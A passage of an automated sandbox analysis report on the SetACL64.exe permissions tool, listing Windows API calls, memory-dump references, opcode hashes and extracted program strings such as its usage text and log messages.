                                        • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF686877733,?,00000000,00000092,?,?,00000000,?,00007FF68686966D), ref: 00007FF6868770DA
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: ErrorLast$EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2417226690-0
                                        • Opcode ID: 1afc97474f9d45eb20386b3fa683427653916469593d3b285663595b79b4a93e
                                        • Instruction ID: 7dd87d9b78635a830b3dcd8030721f27d588ec3d93a822a73866d1ea84b7a963
                                        • Opcode Fuzzy Hash: 1afc97474f9d45eb20386b3fa683427653916469593d3b285663595b79b4a93e
                                        • Instruction Fuzzy Hash: 2E0192A2B09285C6E7144B15E4407B976A1FF40BA4F459235D76D876D5CE7B9C80C710
                                        APIs
                                        • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF686877D71,?,?,?,?,?,?,?,?,00000000,00007FF6868765D8), ref: 00007FF68687796B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: EnumLocalesSystem
                                        • String ID:
                                        • API String ID: 2099609381-0
                                        • Opcode ID: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
                                        • Instruction ID: c306239d1734bb5ca2473b45a06e15ac1de8fe6bfd661306a2a7304e562cc734
                                        • Opcode Fuzzy Hash: 50e1e414d65792309ee3aaeac2ef96dc1d2e2a6e8bc8ede1a31a07ac19fd8208
                                        • Instruction Fuzzy Hash: A4F0F6B6A08B85C3E7049B15E8546A922A2BF98B80F448139DA4D97369DE3DD861C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: HeapProcess
                                        • String ID:
                                        • API String ID: 54951025-0
                                        • Opcode ID: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
                                        • Instruction ID: f4c0dd2543cf37570a6df173d85a1198517d4938fbd84c4fd2adcb355c3637f0
                                        • Opcode Fuzzy Hash: 227af5b2b01adeec9a4c4bb0160e400c0b56438fa23b95ceffa25b2c6b663f7a
                                        • Instruction Fuzzy Hash: 65B09260E17A0AC6EA482B116C4221422A67F88700F88413CC04DC1330EF2D28A68720
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
                                        • Instruction ID: eaed822394d7897ce4221a68ba08a33e152f8dfb5048b762e488c3867975eb91
                                        • Opcode Fuzzy Hash: 661991537337df00cfedef2c042225d99e55b89d68283520a0b1d8c619bedd07
                                        • Instruction Fuzzy Hash: 4EF068B1718255CADB948F69A40262977D1FB483C0F40C07DD5CDC7B14DA3D9460CF18
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0d0e1896d5a2671fcb65b32faac8bfb0f24e93e9d35c82eef40207f8067d8423
                                        • Instruction ID: 0b568bb87c41468da6c293a72634647d086196acb25e68c936ee87ce2a58cb49
                                        • Opcode Fuzzy Hash: 0d0e1896d5a2671fcb65b32faac8bfb0f24e93e9d35c82eef40207f8067d8423
                                        • Instruction Fuzzy Hash: 7BA002A195CC0AE5E6088F01E9550356331FF94750F411039C20DC1072DF3EAE05C325
                                        APIs
                                          • Part of subcall function 00007FF686834810: FindResourceW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834859
                                          • Part of subcall function 00007FF686834810: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF68683486D
                                          • Part of subcall function 00007FF686834810: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834882
                                          • Part of subcall function 00007FF686834810: FreeResource.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF68683FCA1), ref: 00007FF686834964
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686828D9E
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686828DA4
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686828DAA
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686828DB0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: Resource_invalid_parameter_noinfo_noreturn$FindFreeLoadLock
                                        • String ID: SetACL by Helge Klein$ -actn Action1 ParametersForAction1$ [-actn Action2 ParametersForAction2]$ [Options]$=======$==============$Copyright: Helge Klein$Documentation and examples are maintained at$Documentation:$FileVersion$Homepage: https://helgeklein.com$License: Freeware$SetACL -on ObjectName -ot ObjectType$Syntax:$The usage reference can be found at$Version: $https://helgeklein.com.$https://helgeklein.com/setacl/documentation/command-line-version-setacl-exe
                                        • API String ID: 3000141576-3422969368
                                        • Opcode ID: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
                                        • Instruction ID: db308be865448a961b9c0b31af7401c848ebc826b6874349b9a457f0baa38385
                                        • Opcode Fuzzy Hash: 69f405b78d0f5892647151657973b3344c7a68e1b36205c54eef986998ac8fed
                                        • Instruction Fuzzy Hash: DE91A1F1E28A42D8FB00EB64E8953BD2322BF54758F804139D60D866E6DF7EE954C360
                                        APIs
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF6868782AF
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF6868782CE
                                          • Part of subcall function 00007FF686877998: GetProcAddress.KERNEL32(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877AF0
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF6868782ED
                                          • Part of subcall function 00007FF686877998: LoadLibraryExW.KERNELBASE(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877A3B
                                          • Part of subcall function 00007FF686877998: GetLastError.KERNEL32(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877A49
                                          • Part of subcall function 00007FF686877998: LoadLibraryExW.KERNEL32(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877A8B
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF68687830C
                                          • Part of subcall function 00007FF686877998: FreeLibrary.KERNEL32(?,?,00000006,00007FF686877E8A,?,?,0000F23FCA72FB90,00007FF68687402A,?,?,0000F23FCA72FB90,00007FF68686E201), ref: 00007FF686877AC4
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF68687832B
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF68687834A
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF686878369
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF686878388
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF6868783A7
                                        • try_get_function.LIBVCRUNTIME ref: 00007FF6868783C6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                        • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                        • API String ID: 3255926029-3252031757
                                        • Opcode ID: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
                                        • Instruction ID: 29258748c91e17bcbf5dcb6540d27afc1c18e4c14e001c0f592ee7e051479d39
                                        • Opcode Fuzzy Hash: 9211e9d41fbef9106278706ba9ffd9f3a7d029d209f8dabeb844061a5d1a6813
                                        • Instruction Fuzzy Hash: 51314FE0A09A4BE2F604DB75E8516E06321BF65348FC0543FE10D961B5DE7EAE4AC760
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: " $AddTrusteesFromFile$Input file for trustee operation opened: '
                                        • API String ID: 0-3105513592
                                        • Opcode ID: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
                                        • Instruction ID: c8eac5995f803667b206ae1984d4e1b885ca59e88142cff51a689b0efc943b9d
                                        • Opcode Fuzzy Hash: cfcd9179b3afa49e84231abe562083495f775b235c5cd478525bc830438bbd8e
                                        • Instruction Fuzzy Hash: 5EA17EA2A28B52C5F7109B64D8983FD2371FF44788F405439DA4C97AAADF7DE980C364
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterLeave
                                        • String ID: on $====================================================================$FileVersion$SetLogFile$Starting SetACL.exe
                                        • API String ID: 363805048-2110037876
                                        • Opcode ID: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
                                        • Instruction ID: 6eec1cd2a4303bcb07f100f73594248ec9fe21cb4d3bd4b246e06f79bb912e6e
                                        • Opcode Fuzzy Hash: bfe008777ad23c9cdc2350b9679eda7746b6eef8af8c9e99fa761d27b66fba6f
                                        • Instruction Fuzzy Hash: 382283B2B18B41C1EB008B68D5493AD6765FF857E8F505229DB5C47AEADF7EE880C310
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLast$CreateDirectory
                                        • String ID: ' could not be created because: $CreateDirectoryAPIWrapper$Created the directory '$Directory already exists: '$The directory '
                                        • API String ID: 3201042626-1824261680
                                        • Opcode ID: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
                                        • Instruction ID: 93511b38c148271b7b8752f99d1cb1c9bd9f17d96bdad5aff9e6079489fe33ac
                                        • Opcode Fuzzy Hash: d1b5d7231ef0ce28a8e66e00800bd7d89ee647de3540f67a21a8ce9304b88add
                                        • Instruction Fuzzy Hash: DA02A0A2B18B42C5EB00CF78D4593AC2322BF447A8F405239DA6D976EADF7DE945C314
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$ErrorLastVersion
                                        • String ID: Prepare$SetACL only supports Windows Vista and later.$The version of your operating system could not be determined.
                                        • API String ID: 1165008562-2181592180
                                        • Opcode ID: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                                        • Instruction ID: 404cbae69a388cced9087b609e9ddc220526397fc3701baf575379e0d3a99ea1
                                        • Opcode Fuzzy Hash: 727d599cbf774fd4c5ba4d8356de33424bd120d4bccaa165a2686ec5f0d8e0cb
                                        • Instruction Fuzzy Hash: 8071C9B1A69783C1EA009B64D0887AD6321FF857A4F401539E75D876FADFBEE840C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn
                                        • String ID:
                                        • API String ID: 3668304517-0
                                        • Opcode ID: 46baa353a109fce6319f0045732bcd5145af92d8f24574fb33639b16f7aed1b8
                                        • Instruction ID: d676bfd7afe2c6603d926ac75539bccb0f188e547e0cabb8e52d75d32d920b7d
                                        • Opcode Fuzzy Hash: 46baa353a109fce6319f0045732bcd5145af92d8f24574fb33639b16f7aed1b8
                                        • Instruction Fuzzy Hash: E04158E1A7A753C0F900A768D4EE3BD1222FF45794F401939D75C8A5E7EE6EA940C224
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
                                        • Instruction ID: 8f60d5d810b9164fd4eac0618ac9a524d2b8955fc1b6da52651a777547485502
                                        • Opcode Fuzzy Hash: c5659fc54ca624ddf6d2490e80867d1b248a83083ebe8249bddcb2d4f27d4c86
                                        • Instruction Fuzzy Hash: 953132E1ABA753C4F910B76894EE3BD1222FF41794F401839D75C8A9E7EE6E6940C234
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Enum$CloseOpenResource
                                        • String ID: > failed with: $GetUNCPathOfMappedDrive$Retrieving the remote path for mapped drive L<
                                        • API String ID: 3788045339-1117730555
                                        • Opcode ID: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
                                        • Instruction ID: 897cc88404d4dfa97863e5fa0c13b52ffe57b4b43dfa5834001ac48dd7796fef
                                        • Opcode Fuzzy Hash: 26ce30747a7c3376bf249c0467c749ccf99a2e6852225826950c2a27f422109d
                                        • Instruction Fuzzy Hash: 171281E2B19781C1FA008B68E4493AD6362FF847A4F505239DB5D87AE9DF7DE880C710
                                        APIs
                                        • IsValidAcl.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A2F4
                                        • GetAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A30D
                                        • DeleteAce.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A338
                                        • GetAclInformation.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A354
                                        • GetLengthSid.ADVAPI32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A361
                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00000000,?,?,00000000,00000000,?,?,00007FF6868599CE), ref: 00007FF68685A37F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: DeleteErrorInformationLastLengthValid
                                        • String ID:
                                        • API String ID: 1967920013-0
                                        • Opcode ID: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
                                        • Instruction ID: 58542d67ca344bdf5a615978e665ffeef6b3c891745f053a4b965f1c3b398326
                                        • Opcode Fuzzy Hash: fa47e8455b8d5f9eec009974956262ef4a7b95b3ec48f1941adf8a6189de3f14
                                        • Instruction Fuzzy Hash: 598175A6A1C645C6EB509B62A59827E77A1BFC4B84F044039EE8F87765DF3EDC04C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: String$ArraySafe$AllocFree$BoundConcurrency::cancel_current_taskDataVariant$AccessClearInitUnaccess
                                        • String ID: GetSD$__systemsecurity=@
                                        • API String ID: 2119716662-3672729512
                                        • Opcode ID: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
                                        • Instruction ID: e6dbbc69f34ff03896bbf94479b3e3d21ce669ca0c7432d3985f61394abfc725
                                        • Opcode Fuzzy Hash: a4bc5dedb66d47c51631d50f3265cb4853a502811ef6be4f41ada5bd415db247
                                        • Instruction Fuzzy Hash: CC917DB2A09B46C6EB149B21E45437963A4FF84B80F048439DE4E83BA5DF7EEC44C760
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn
                                        • String ID: Prepare$The object type was not specified.
                                        • API String ID: 3668304517-3861202280
                                        • Opcode ID: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
                                        • Instruction ID: 2d0ad0974eb36455030cfee97f42aca414ac69c5a7eb59dce5996f5ab247f440
                                        • Opcode Fuzzy Hash: f6146cc0b52683d5413a34b6f752e51676bb9cf189912ec02217d27d55aa915d
                                        • Instruction Fuzzy Hash: 1A3196E1669783C1EA009B64D0993BE6321FF453D4F401539E75C866EADE7EE940C724
                                        APIs
                                        Strings
                                        Memory Dump Source
